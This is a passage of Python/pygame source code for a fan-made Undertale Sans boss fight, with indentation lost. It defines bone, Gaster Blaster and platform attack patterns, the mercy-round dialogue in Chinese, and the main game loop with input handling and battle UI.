pos=[BOX_POS[0], BOX_POS[1] - 8],
length=10,
direction=DOWN,
time1=1000,
time2=_ * 60 + 60,
speed=[8, 0],
type_=2
))
bones.append(
Bone(
pos=[BOX_POS[0], BOX_POS[1] + 30 + 16],
length=1000,
direction=DOWN,
time1=1000,
time2=_ * 60 + 60,
speed=[8, 0],
type_=1
))
bones.append(
Bone(
pos=BOX_POS,
length=1000,
direction=DOWN,
time1=1000,
time2=_ * 60 + 60 + 8,
speed=[8, 0],
type_=1,
color=ORANGE
))
players_turn("* ...")
@add_attack
def bone_gap():
set_turn_time(1000)
global BOX_POS, BOX_SIZE
BOX_POS = [150, 230]
BOX_SIZE = [300, 150]
sans.hand_direction = DOWN
player.type = BLUE_SOUL
player.direction = DOWN
player.falling_speed = 10
tasks.append(Task(shake,
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
tasks.append(Task(unshake,
((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))
tasks.append(Task(lambda screen : slam_sound.play(),
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
for _ in range(10):
x = BOX_POS[0] + random.randint(100, BOX_SIZE[0] - 100)
bones.append(Bone(
pos=[x, BOX_POS[1]],
time1=10,
time2=_ * 100,
speed=[0, 0, BOX_SIZE[1] / 10],
length=0,
direction=DOWN,
color=BLUE
))
bones.append(Bone(
pos=[x, BOX_POS[1]],
time1=10,
time2=_ * 100 + 10,
speed=[0, 0, -BOX_SIZE[1] / 10],
length=BOX_SIZE[1],
direction=DOWN,
color=BLUE
))
tasks.append(Task(shake,_ * 100 + 10))
tasks.append(Task(unshake,_ * 100 + 15))
tasks.append(Task(lambda screen : slam_sound.play(),
_ * 100 + 15))
y = BOX_POS[1] + random.randint(70, BOX_SIZE[1] - 30)
bones.append(Bone(
pos=[BOX_POS[0], y],
time1=10,
time2=_ * 100,
speed=[0, 0, BOX_SIZE[0] / 10],
length=0,
direction=RIGHT,
color=ORANGE
))
bones.append(Bone(
pos=[BOX_POS[0], y],
time1=10,
time2=_ * 100 + 10,
speed=[0, 0, -BOX_SIZE[0] / 10],
length=BOX_SIZE[0],
direction=RIGHT,
color=ORANGE
))
bones.append(
Bone(
pos=[BOX_POS[0], BOX_POS[1] - 8],
length=y - BOX_POS[1] - 16,
direction=DOWN,
time1=1000,
time2=_ * 100 + 60,
speed=[(x - BOX_POS[0]) / 30, 0],
type_=2
))
bones.append(
Bone(
pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 8],
length=y - BOX_POS[1] - 16,
direction=DOWN,
time1=1000,
time2=_ * 100 + 60,
speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],
type_=2
))
bones.append(
Bone(
pos=[BOX_POS[0], y + 8],
length=1000,
direction=DOWN,
time1=1000,
time2=_ * 100 + 60,
speed=[(x - BOX_POS[0]) / 30, 0],
type_=1
))
bones.append(
Bone(
pos=[BOX_POS[0] + BOX_SIZE[0], y + 8],
length=1000,
direction=DOWN,
time1=1000,
time2=_ * 100 + 60,
speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],
type_=1
))
players_turn("* ...")
@add_attack
def board_1():
set_turn_time(10)
global BOX_POS, BOX_SIZE
BOX_POS = [50, 240]
BOX_SIZE = [500, 140]
sans.hand_direction = DOWN
player.type = BLUE_SOUL
player.direction = DOWN
player.falling_speed = 10
tasks.append(Task(shake,
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
tasks.append(Task(unshake,
((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))
tasks.append(Task(lambda screen : slam_sound.play(),
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
@add_attack
def board_2():
set_turn_time(600)
tasks.append(Task(shake, 70))
tasks.append(Task(unshake, 75))
blasters.append(
GasterBlaster(
pos=[10, BOX_POS[1] + BOX_SIZE[1]],
angle=0,
time1=10,
time2=70,
time3=10,
width=70
)
)
blasters.append(
GasterBlaster(
pos=[10, BOX_POS[1]],
angle=0,
time1=10,
time2=70,
time3=10,
width=30
)
)
for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 12):
bones.append(
Bone(
pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30],
length=1000,
direction=UP,
time1=1000,
time2=100,
speed=[0, 0],
type_=1
)
)
bones.append(
Bone(
pos=[x, BOX_POS[1] - 8],
length=5,
direction=DOWN,
time1=1000,
time2=100,
speed=[0, 0],
type_=2
)
)
boards.append(
Board(
pos=[BOX_POS[0],BOX_POS[1] + BOX_SIZE[1] - 40],
length=40,
speed=[1, 0],
time1=BOX_SIZE[0],
time2=100,
direction=UP
)
)
for _ in range(0, 20, 4):
bones.append(
Bone(
pos=[BOX_POS[0] + BOX_SIZE[0],
BOX_POS[1] + BOX_SIZE[1] - 40 - 25],
length=1000,
direction=UP,
time1=BOX_SIZE[0] // 4,
time2=150 + (_ * 30),
speed=[-4, 0]
)
)
def start_spinning(screen):
global spinning_left
spinning_left = True
def stop_spinning(screen):
global spinning_left
spinning_left = False
tasks.append(Task(start_spinning, 200))
tasks.append(Task(stop_spinning, 380))
tasks.append(Task(start_spinning, 500))
tasks.append(Task(stop_spinning, 680))
tasks.append(Task(lambda screen:set_screen_angle(0), 682))
@add_attack
def board_3():
set_turn_time(100)
sans.hand_direction = LEFT
player.type = BLUE_SOUL
player.direction = LEFT
player.falling_speed = 10
tasks.append(Task(shake,
(player.pos[0] - BOX_POS[0]) // 10))
tasks.append(Task(unshake,
((player.pos[0] - BOX_POS[0]) // 10) + 5))
tasks.append(Task(lambda screen : slam_sound.play(),
(player.pos[0] - BOX_POS[0]) // 10))
tasks.append(Task(shake, 60))
tasks.append(Task(unshake, 65))
blasters.append(
GasterBlaster(
pos=[BOX_POS[0], 10],
angle=90,
time1=10,
time2=50,
time3=0,
width=50
)
)
@add_attack
def board_4():
set_turn_time(0)
bones.clear()
players_turn("* ...")
@add_attack
def board_2_1():
set_turn_time(10)
global BOX_POS, BOX_SIZE
BOX_POS = [50, 240]
BOX_SIZE = [500, 140]
sans.hand_direction = DOWN
player.type = BLUE_SOUL
player.direction = DOWN
player.falling_speed = 10
tasks.append(Task(shake,
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
tasks.append(Task(unshake,
((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))
tasks.append(Task(lambda screen : slam_sound.play(),
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
@add_attack
def board_2_2():
set_turn_time(600)
tasks.append(Task(shake, 70))
tasks.append(Task(unshake, 75))
blasters.append(
GasterBlaster(
pos=[10, BOX_POS[1] + BOX_SIZE[1]],
angle=0,
time1=10,
time2=70,
time3=10,
width=70
)
)
tasks.append(Task(shake, 250))
tasks.append(Task(unshake, 255))
blasters.append(
GasterBlaster(
pos=[10, BOX_POS[1] + BOX_SIZE[1] - 20],
angle=0,
time1=10,
time2=70,
time3=250,
width=70
)
)
boards.append(
Board(
pos=[BOX_POS[0] + BOX_SIZE[0],
BOX_POS[1] + BOX_SIZE[1] - 30 - 10],
time1=1000,
time2=0,
speed=[-2, 0],
length=40
)
)
boards.append(
Board(
pos=[BOX_POS[0] + BOX_SIZE[0],
BOX_POS[1] + BOX_SIZE[1] - 30 - 10],
time1=1000,
time2=100,
speed=[-1.5, 0],
length=40
)
)
boards.append(
Board(
pos=[BOX_POS[0] + BOX_SIZE[0],
BOX_POS[1] + BOX_SIZE[1] - 30 - 10],
time1=1000,
time2=200,
speed=[-1, 0],
length=40
)
)
boards.append(
Board(
pos=[BOX_POS[0] + BOX_SIZE[0],
BOX_POS[1] + BOX_SIZE[1] - 30 - 30],
time1=1000,
time2=300,
speed=[-3, 0],
length=80
)
)
for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 12):
bones.append(
Bone(
pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30],
length=1000,
direction=UP,
time1=400,
time2=100,
speed=[0, 0],
type_=1
)
)
bones.append(
Bone(
pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30],
length=1000,
direction=UP,
time1=1000,
time2=500,
speed=[0, 0],
type_=1
)
)
players_turn("* ...")
@add_attack
def bone_lid1():
set_turn_time(70)
global BOX_SIZE, BOX_POS
BOX_POS = [200, 240]
BOX_SIZE = [200, 150]
sans.hand_direction = DOWN
player.type = BLUE_SOUL
player.direction = DOWN
player.falling_speed = 10
tasks.append(Task(shake,
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
tasks.append(Task(unshake,
((BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10) + 5))
tasks.append(Task(lambda screen : slam_sound.play(),
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
bones.append(
RotatableBone(
pos=[BOX_POS[0] - 70, BOX_POS[1] + BOX_SIZE[1]],
time1=1000,
length=130,
angle=45,
speed=[5, 0, 0, 0]
)
)
bones.append(
RotatableBone(
pos=[BOX_POS[0] + BOX_SIZE[0] + 70, BOX_POS[1] + BOX_SIZE[1]],
time1=1000,
length=130,
angle=-45,
speed=[-5, 0, 0, 0]
)
)
@add_attack
def bone_lid2():
set_turn_time(60)
sans.hand_direction = UP
player.type = BLUE_SOUL
player.direction = UP
player.falling_speed = 10
player.falling = True
tasks.append(Task(shake,
(player.pos[1] - BOX_POS[1]) // 10))
tasks.append(Task(unshake,
((player.pos[1] - BOX_POS[1]) // 10) + 5))
tasks.append(Task(lambda screen : slam_sound.play(),
(BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))
bones.append(
RotatableBone(
pos=[BOX_POS[0] - 20, BOX_POS[1]],
time1=1000,
length=130,
angle=-45,
speed=[5, 0, 0, 0]
)
)
bones.append(
RotatableBone(
pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[1]],
time1=1000,
length=130,
angle=45,
speed=[-5, 0, 0, 0]
)
)
@add_attack
def bone_lid3():
set_turn_time(1300)
player.type = RED_SOUL
for _ in range(20):
bones.append(
RotatableBone(
pos=[BOX_POS[0], BOX_POS[1] - 20],
time1=1000,
time2=_ * 60,
length=260,
angle=-45,
speed=[0, 2, 0, 0]
)
)
bones.append(
RotatableBone(
pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] + 20],
time1=1000,
time2=_ * 60,
length=260,
angle=45,
speed=[0, -2, 0, 0]
)
)
bones.append(
RotatableBone(
pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 20],
time1=1000,
time2=_ * 60 + 30,
length=260,
angle=45,
speed=[0, 2, 0, 0]
)
)
bones.append(
RotatableBone(
pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] + BOX_SIZE[1] + 20],
time1=1000,
time2=_ * 60 + 30,
length=260,
angle=-45,
speed=[0, -2, 0, 0]
)
)
players_turn("* ...")
@add_attack
def mercy1():
pygame.mixer.music.pause()
sans.say("好了,我也累了,不如我们休息一下?")
@add_attack
def mercy2():
sans.say("这也是一个改过自新的机会,")
@add_attack
def mercy3():
sans.say("赶紧按下饶恕,")
@add_attack
def mercy4():
sans.headtype = SANS_NO_EYES
sans.say("否则你绝对不想见到下一个回合")
@add_attack
def mercy5():
set_turn_time(0)
sans.headtype = SANS_NORMAL
players_turn("* ...")
@add_attack
def before_flash():
sans.say("好吧,看来你已经做出了自己的选择。")
@add_attack
def flash_round():
set_turn_time(10)
global blackout
flash_sound.play()
blackout = True
bones.clear()
blasters.clear()
boards.clear()
def flash(screen):
global blackout
blackout = False
flash_sound.play()
pygame.mixer.music.unpause()
tasks.append(Task(flash, 10))
def flash_round_1():
set_turn_time(150)
global _boxsize, _boxpos, BOX_POS, BOX_SIZE
player.type = BLUE_SOUL
player.direction = DOWN
BOX_SIZE = _boxsize = [150, 150]
BOX_POS = _boxpos = [230, 230]
player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,
100000]
direction = random.randint(0, 1)
blasters.append(
GasterBlaster(
pos=[BOX_POS[0] - 30, BOX_POS[1] + BOX_SIZE[1] - 30],
angle=0,
time1=0,
time2=30,
time3=10,
width=90
)
)
blasters.append(
GasterBlaster(
pos=[BOX_POS[0] - 30, BOX_POS[1] - 30],
angle=0,
time1=0,
time2=30,
time3=60,
width=90
)
)
if direction:
blasters.append(
GasterBlaster(
pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 30],
angle=90,
time1=0,
time2=30,
time3=10,
width=90
)
)
blasters.append(
GasterBlaster(
pos=[BOX_POS[0], BOX_POS[1] - 30],
angle=90,
time1=0,
time2=30,
time3=60,
width=90
)
)
else:
blasters.append(
GasterBlaster(
pos=[BOX_POS[0], BOX_POS[1] - 30],
angle=90,
time1=0,
time2=30,
time3=10,
width=90
)
)
blasters.append(
GasterBlaster(
pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 30],
angle=90,
time1=0,
time2=30,
time3=60,
width=90
)
)
for angle in range(0, 360, 10):
bones.append(RotatableBone(
pos=[BOX_POS[0] + BOX_SIZE[0] / 2 + cos(radians(angle)) * BOX_SIZE[0] / 2,
BOX_POS[1] + BOX_SIZE[1] / 2 + 25 + sin(radians(angle)) * BOX_SIZE[1] / 2],
length=25,
angle=angle,
time1=150
)
)
if angle % 30 == 0:
bones.append(RotatableBone(
pos=[BOX_POS[0] + BOX_SIZE[0] / 2,
BOX_POS[1] + BOX_SIZE[1] / 2 + 25],
length=40,
angle=angle,
speed=[0, 0, 0, 5],
time1=130,
time2=20
)
)
def flash_round_2():
set_turn_time(100)
global _boxsize, _boxpos, BOX_POS, BOX_SIZE
BOX_SIZE = _boxsize = [150, 150]
BOX_POS = _boxpos = [230, 230]
player.type = RED_SOUL
player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,
BOX_POS[1] + BOX_SIZE[1] / 2]
def zjj(screen):
angle = random.randint(-140, -40)
d = random.randint(10, 200)
blasters.append(GasterBlaster(
pos=[
player.pos[0] + math.cos(math.radians(angle)) * d,
player.pos[1] + math.sin(math.radians(angle)) * d],
angle=angle - 180,
time1=0,
time2=20,
width=50
))
for _ in range(0, 50):
tasks.append(Task(zjj, _ / 2))
def flash_round_3():
set_turn_time(100)
global _boxsize, _boxpos, BOX_POS, BOX_SIZE
BOX_SIZE = _boxsize = [150, 150]
BOX_POS = _boxpos = [200, 230]
player.type = RED_SOUL
player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,
BOX_POS[1] + BOX_SIZE[1] / 2]
blasters.append(
GasterBlaster(
pos=[BOX_POS[0] + BOX_SIZE[0] / 2, 50],
angle=90,
time1=10,
time2=70,
time3=0,
width=60
)
)
blasters.append(
GasterBlaster(
pos=[50, BOX_POS[1] + BOX_SIZE[1] / 2],
angle=0,
time1=10,
time2=70,
time3=0,
width=60
)
)
def flash_round_4():
set_turn_time(100)
global _boxsize, _boxpos, BOX_POS, BOX_SIZE
BOX_SIZE = _boxsize = [150, 150]
BOX_POS = _boxpos = [230, 230]
player.type = RED_SOUL
player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,
BOX_POS[1] + BOX_SIZE[1] / 2]
blasters.append(
GasterBlaster(
pos=[BOX_POS[0] - 10, BOX_POS[1] - 10],
angle=45,
time1=10,
time2=70,
time3=0,
width=60
)
)
blasters.append(
GasterBlaster(
pos=[BOX_POS[0] - 10, BOX_POS[1] + BOX_SIZE[1] + 10],
angle=-45,
time1=10,
time2=70,
time3=0,
width=60
)
)
def flash_round_5():
set_turn_time(100)
global _boxsize, _boxpos, BOX_POS, BOX_SIZE
BOX_SIZE = _boxsize = [150, 150]
BOX_POS = _boxpos = [230, 230]
player.type = RED_SOUL
player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,
BOX_POS[1] + BOX_SIZE[1] / 2]
blasters.append(
GasterBlaster(
pos=[BOX_POS[0], 50],
angle=90,
time1=10,
time2=70,
time3=0,
width=60
)
)
blasters.append(
GasterBlaster(
pos=[BOX_POS[0] + BOX_SIZE[0], 50],
angle=90,
time1=10,
time2=70,
time3=0,
width=60
)
)
blasters.append(
GasterBlaster(
pos=[50, BOX_POS[1] + 50],
angle=0,
time1=10,
time2=70,
time3=0,
width=100
)
)
def flash_round_6():
set_turn_time(100)
global _boxsize, _boxpos, BOX_POS, BOX_SIZE
BOX_SIZE = _boxsize = [150, 150]
BOX_POS = _boxpos = [230, 230]
player.type = RED_SOUL
player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,
BOX_POS[1] + BOX_SIZE[1] / 2]
blasters.append(
GasterBlaster(
pos=[BOX_POS[0], 50],
angle=90,
time1=10,
time2=70,
time3=0,
width=60
)
)
blasters.append(
GasterBlaster(
pos=[BOX_POS[0] + BOX_SIZE[0], 50],
angle=90,
time1=10,
time2=70,
time3=0,
width=60
)
)
blasters.append(
GasterBlaster(
pos=[50, BOX_POS[1] + BOX_SIZE[1] - 50],
angle=0,
time1=10,
time2=70,
time3=0,
width=100
)
)
def flash_round_7():
set_turn_time(150)
global BOX_SIZE, BOX_POS, _boxpos, _boxsize
BOX_POS = _boxpos = [230, 230]
BOX_SIZE = _boxsize = [150, 150]
player.type = RED_SOUL
player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2,
BOX_POS[1] + BOX_SIZE[1] / 2]
for _ in range(3):
bones.append(
RotatableBone(
pos=[BOX_POS[0], BOX_POS[1] - 20],
time1=1000,
time2=_ * 50 + 20,
length=150,
angle=-20,
speed=[0, 4, 0, 0]
)
)
bones.append(
RotatableBone(
pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] + 20],
time1=1000,
time2=_ * 50 + 20,
length=150,
angle=20,
speed=[0, -4, 0, 0]
)
)
bones.append(
RotatableBone(
pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 20],
time1=1000,
time2=_ * 50 + 50,
length=150,
angle=20,
speed=[0, 4, 0, 0]
)
)
bones.append(
RotatableBone(
pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] + BOX_SIZE[1] + 20],
time1=1000,
time2=_ * 50 + 50,
length=150,
angle=-20,
speed=[0, -4, 0, 0]
)
)
random_attacks = [flash_round_1,
flash_round_2,
flash_round_3,
flash_round_4,
flash_round_5,
flash_round_6,
flash_round_7]
for _ in range(5):
attacks.append(random.choice(random_attacks))
attacks.append(flash_round)
players_turn("* ...")
@add_attack
def windmill():
set_turn_time(1200)
global BOX_POS, BOX_SIZE, before_strike, after_strike
def before_strike():
global sans_damage
sans_damage = 1
after_strike = lambda : ...
BOX_POS = [150, 240]
BOX_SIZE = [150, 150]
def movegb(screen):
for i in range(4):
blasters[i].angle += 1
blasters[i].end_angle += 1
blasters[i].radian += radians(-1)
blasters[i].back_speed = 0
for angle in range(360 * 5):
tasks.append(Task(movegb, angle * 0.4 + 100))
def enablerecoil(screen):
for b in blasters:
b.norecoil = False
tasks.append(Task(enablerecoil, 800))
for angle in range(0, 360, 90):
blasters.append(GasterBlaster(
pos=[150 + 150 / 2, 240 + 150 / 2],
angle=angle,
time1=10,
time2=1000,
width=30,
time3=0,
norecoil=True
))
players_turn("* ...")
@add_attack
def gameend():
...
# ------------------------------------
"""主程序"""
while True:
# ---------------------------------------------------------
'''实例化'''
from locals_ import *
time = 0
_boxpos = [0, 0]
_boxsize = SCREEN_SIZE[:]
rightdown = SCREEN_SIZE[:]
time1 = 0
time2 = 0
delta = 1
blasters = []
bones = []
tasks = []
warns = []
texts = []
boards = []
before_strike = None
after_strike = None
sans = Sans([280, 80])
player = Player([0, 0])
actions = {
"* check" : CHECK_SANS,
"* heal ({} time(s) left)" : HEAL_SANS
}
mc_actions = {
"* spare" : MERCY_SANS_SPARE,
"* flee" : MERCY_SANS_FLEE
}
pygame.mixer.music.stop()
if FULL_SCREEN:
display = pygame.display.set_mode((1920, 1080), FULLSCREEN)
else:
display = pygame.display.set_mode(SCREEN_SIZE)
while True:
time1 = time_.time()
# 屏幕震动
if screen_shaking:
screen_offset[0] = random.randint(-5, 5)
screen_offset[1] = random.randint(-5, 5)
else:
screen_offset = [0, 0]
# 屏幕旋转
if spinning_left:
screen_angle -= 1
# 屏幕旋转
if spinning_right:
screen_angle += 1
# 测试区
if DEBUG:...
# 战斗框位移
if _boxpos[0] != BOX_POS[0]:
if abs(BOX_POS[0] - _boxpos[0]) < 0.1:
_boxpos[0] = BOX_POS[0]
else:
_boxpos[0] += (BOX_POS[0] - _boxpos[0]) / 5
if _boxpos[1] != BOX_POS[1]:
if abs(BOX_POS[1] - _boxpos[1]) < 0.1:
_boxpos[1] = BOX_POS[1]
else:
_boxpos[1] += (BOX_POS[1] - _boxpos[1]) / 5
# 战斗框大小
if rightdown[0] != BOX_POS[0] + BOX_SIZE[0]:
if abs(BOX_POS[0] + BOX_SIZE[0] - rightdown[0]) < 0.1:
rightdown[0] = BOX_POS[0] + BOX_SIZE[0]
else:
rightdown[0] += (BOX_POS[0] + BOX_SIZE[0] - rightdown[0]) / 5
if rightdown[1] != BOX_POS[1] + BOX_SIZE[1]:
if abs(BOX_POS[1] + BOX_SIZE[1] - rightdown[1]) < 0.1:
rightdown[1] = BOX_POS[1] + BOX_SIZE[1]
else:
rightdown[1] += (BOX_POS[1] + BOX_SIZE[1] - rightdown[1]) / 5
_boxsize = [
rightdown[0] - _boxpos[0],
rightdown[1] - _boxpos[1]
]
if time >= len(attacks):
exit()
if not stop and not is_players_turn:
attacks[time]()
time += 1
stop = True
screen.fill((0, 0, 0, 255))
display.fill((0, 0, 0))
mask_surface_blue.fill((0, 0, 0, 0))
mask_surface_orange.fill((0, 0, 0, 0))
mask_surface_normal.fill((0, 0, 0, 0))
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
exit()
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
pygame.quit()
exit()
if event.key in (K_z, K_RETURN):
if sans.show_index >= len(sans.text) and sans.show_text == True:
sans.show_text = False
stop = False
elif page in (CHECK_SANS, HEAL_SANS, HEAL_SANS_CANT) and shown_index >= len(battle_text):
is_players_turn = False
stop = False
page = MAIN_PAGE
player.pos = [
BOX_POS[0] + BOX_SIZE[0] / 2,
BOX_POS[1] + BOX_SIZE[1] / 2
]
player.select_sound.play()
else:
player.choose = is_players_turn
if is_players_turn and page != FIGHT_SANS:
player.select_sound.play()
if event.key in (K_x, K_RSHIFT):
sans.show_index = len(sans.text)
shown_index = len(battle_text)
player.back = True
player.choice = 0
if event.key == K_UP:
player.going_up = True
if event.key == K_DOWN:
player.going_down = True
if event.key == K_LEFT:
player.going_left = True
if event.key == K_RIGHT:
player.going_right = True
if event.key == K_F4:
if FULL_SCREEN:
display = pygame.display.set_mode(SCREEN_SIZE)
FULL_SCREEN = 0
else:
display = pygame.display.set_mode((1920, 1080), FULLSCREEN)
FULL_SCREEN = 1
if event.key == K_F2:
restarting = True
if DEBUG:
if event.key == K_n:
bones.clear()
boards.clear()
blasters.clear()
stop = False
if event.key == K_EQUALS:
frames += 1
if event.key == K_MINUS:
frames -= 1
if event.type == KEYUP:
if event.key == K_UP:
player.going_up = False
if event.key == K_DOWN:
player.going_down = False
if event.key == K_LEFT:
player.going_left = False
if event.key == K_RIGHT:
player.going_right = False
if event.key == K_ESCAPE:
pygame.quit()
exit()
if event.key in (K_z, K_RETURN):
player.choose = False
if event.key in (K_x, K_RSHIFT):
player.back = False
'''检测&更新'''
# 战斗框
pygame.draw.rect(screen, (255, 255, 255, 255), pygame.Rect((_boxpos[0] - 5, _boxpos[1] - 5),
(_boxsize[0] + 10, _boxsize[1] + 10)))
pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect(_boxpos, _boxsize)) # 内遮挡
# 骨头
for b in bones:
b.show(screen,
mask_surface_blue,
mask_surface_orange,
mask_surface_normal)
if b.stop:
bones.remove(b)
# 警告框
for w in warns:
w.show(screen)
if w.stop:
warns.remove(w)
# 板子
for b in boards:
b.show(screen)
if b.stop:
boards.remove(b)
if b.rect.colliderect(player.rect) and player.falling:
player.pos[0] += b.speed[0]
player.pos[1] += b.speed[1]
if player.direction == DOWN:
player.pos[1] = b.rect.top - 7
elif player.direction == UP:
player.pos[1] = b.rect.bottom - 1
elif player.direction == RIGHT:
player.pos[0] = b.rect.left - 7
elif player.direction == LEFT:
player.pos[0] = b.rect.right - 1
player.falling = False
"""外遮挡"""
pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((0, 0), (SCREEN_SIZE[0], _boxpos[1] - 5)))
pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((0, _boxpos[1] - 5), (_boxpos[0] - 5, _boxsize[1] + 10)))
pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((0, _boxpos[1] + _boxsize[1] + 5),
(SCREEN_SIZE[0], SCREEN_SIZE[1] - (_boxpos[1] + _boxsize[1]) - 5)))
pygame.draw.rect(screen, (0, 0, 0, 255), pygame.Rect((_boxpos[0] + _boxsize[0] + 5, _boxpos[1] - 5),
(SCREEN_SIZE[0] - (_boxpos[0] + _boxsize[0]) - 5, _boxsize[1] + 10)))
'''显示UI(外面)'''
pygame.draw.rect(screen, (191, 0, 0, 255), pygame.Rect((275, 400), (92, 20)))
if player.KR:
pygame.draw.rect(screen, (255, 0, 255, 255), pygame.Rect((275 + player.HP, 400), (round(player.KR), 20)))
pygame.draw.rect(screen, (255, 255, 0, 255), pygame.Rect((275, 400), (player.HP, 20)))
screen.blit(
font2.render(
"{:0>2.0f} / 92".format(player.HP + player.KR),
True,
(255, 255, 255) if not round(player.KR) else (255, 0, 255)
),
(
415,
400
)
)
screen.blit(hp_image, (240, 405))
screen.blit(kr_image, (375, 405))
screen.blit(
font2.render(
"Chara LV 19", True, (255, 255, 255)
), (30, 400)
)
# 显示文本
for text in texts:
screen.blit(
font.render(
text[1], True, (255, 255, 255)
), text[0]
)
if DEBUG:
screen.blit(
font2.render(
"DEBUG", True, (0, 0, 255)
), (200, 0)
)
# 显示帧数
screen.blit(
font2.render(
"FPS:{:0>3d}".format(round(1 / delta)), True, (0, 0, 255)
), (0, 0)
)
if fight:
screen.blit(fight_highlight_image, fight_pos)
else:
screen.blit(fight_default_image, fight_pos)
if act:
screen.blit(act_highlight_image, act_pos)
else:
screen.blit(act_default_image, act_pos)
if item:
screen.blit(item_highlight_image, item_pos)
else:
screen.blit(item_default_image, item_pos)
if mercy:
screen.blit(mercy_highlight_image, mercy_pos)
else:
screen.blit(mercy_default_image, mercy_pos)
# 鳝丝(要放在外面)
sans.show(screen)
if show_sans_damage:
if sans_damage == MISS:
screen.blit(miss_image, (250, 60))
# GB炮(要放在外面)
for t in blasters:
t.show(screen,
mask_surface_blue,
mask_surface_orange,
mask_surface_normal)
if t.stop:
blasters.remove(t)
# 其他东西,blahblahblah(外面)
for t in tasks:
t.show(screen)
if t.stop:
tasks.remove(t)
if is_players_turn: # 玩家回合
BOX_POS = [30, 250]
BOX_SIZE = [570, 130]
if page == MAIN_PAGE:
if shown_index < len(battle_text):
shown_index += 1
text_sound.play()
x = 40
y = 250
for char in battle_text[:shown_index]:
if char != '\n':
screen.blit(
battle_font.render(char, True, (255, 255, 255)),
(x, y)
)
x += 12
if x > BOX_POS[0] + BOX_SIZE[0] or char == "\n":
y += 16
x = 40
player.type = CURSOR_SOUL
player.options = (
(fight_pos[0] + 10, fight_pos[1] + 15),
( act_pos[0] + 10, act_pos[1] + 15),
( item_pos[0] + 10, item_pos[1] + 15),
(mercy_pos[0] + 10, mercy_pos[1] + 15)
)
if player.choice == 0:
fight = True
act = False
item = False
mercy = False
if player.choice == 1:
fight = False
act = True
item = False
mercy = False
if player.choice == 2:
fight = False
act = False
item = True
mercy = False
if player.choice == 3:
fight = False
act = False
item = False
mercy = True
if player.choose:
page = [FIGHT, ACT, 0, MERCY][player.choice]
player.choose = False
player.choice = 0
fight = False
act = False
item = False
mercy = False
if page == ACT:
player.options = [(40, 255)]
screen.blit(
battle_font.render("* sans", True, (255, 255, 255)),
(40, 250)
)
if player.choose:
page = [ACT_SANS][player.choice]
player.choose = False
player.choice = 0
if player.back:
page = MAIN_PAGE
if page == ACT_SANS:
player.options = []
y = 250
for _ in actions.keys():
if actions[_] == HEAL_SANS:
_ = _.format(heal_times_left)
screen.blit(
battle_font.render(_, True, (255, 255, 255)),
(40, y)
)
player.options.append((40, y + 5))
y += 20
if player.choose:
page = list(actions.values())[player.choice]
if page == HEAL_SANS:
if heal_times_left > 0:
heal(player, 92)
heal_times_left -= 1
else:
page = HEAL_SANS_CANT
player.choose = False
player.choice = 0
if player.back:
page = ACT
if page == CHECK_SANS:
player.type = RED_SOUL
player.pos = [
-100,
-100
]
battle_text = "* Sans\n The TRUE HERO.\n ATK:1\n DEF:1\n Nothing to say."
if shown_index < len(battle_text):
shown_index += 1
text_sound.play()
x = 40
y = 250
for char in battle_text[:shown_index]:
if char != '\n':
screen.blit(
battle_font.render(char, True, (255, 255, 255)),
(x, y)
)
x += 12
if x > BOX_POS[0] + BOX_SIZE[0] or char == "\n":
y += 20
x = 40
if page == HEAL_SANS:
player.type = RED_SOUL
player.pos = [
-100,
-100
]
battle_text = "* You are healthy again now.\n* {} time(s) left.".format(heal_times_left)
if shown_index < len(battle_text):
shown_index += 1
text_sound.play()
x = 40
y = 250
for char in battle_text[:shown_index]:
if char != '\n':
screen.blit(
battle_font.render(char, True, (255, 255, 255)),
(x, y)
)
x += 12
if x > BOX_POS[0] + BOX_SIZE[0] or char == "\n":
y += 20
x = 40
if page == HEAL_SANS_CANT:
player.type = RED_SOUL
player.pos = [
-100,
-100
]
battle_text = "* No more times for you to heal!"
if shown_index < len(battle_text):
shown_index += 1
text_sound.play()
x = 40
y = 250
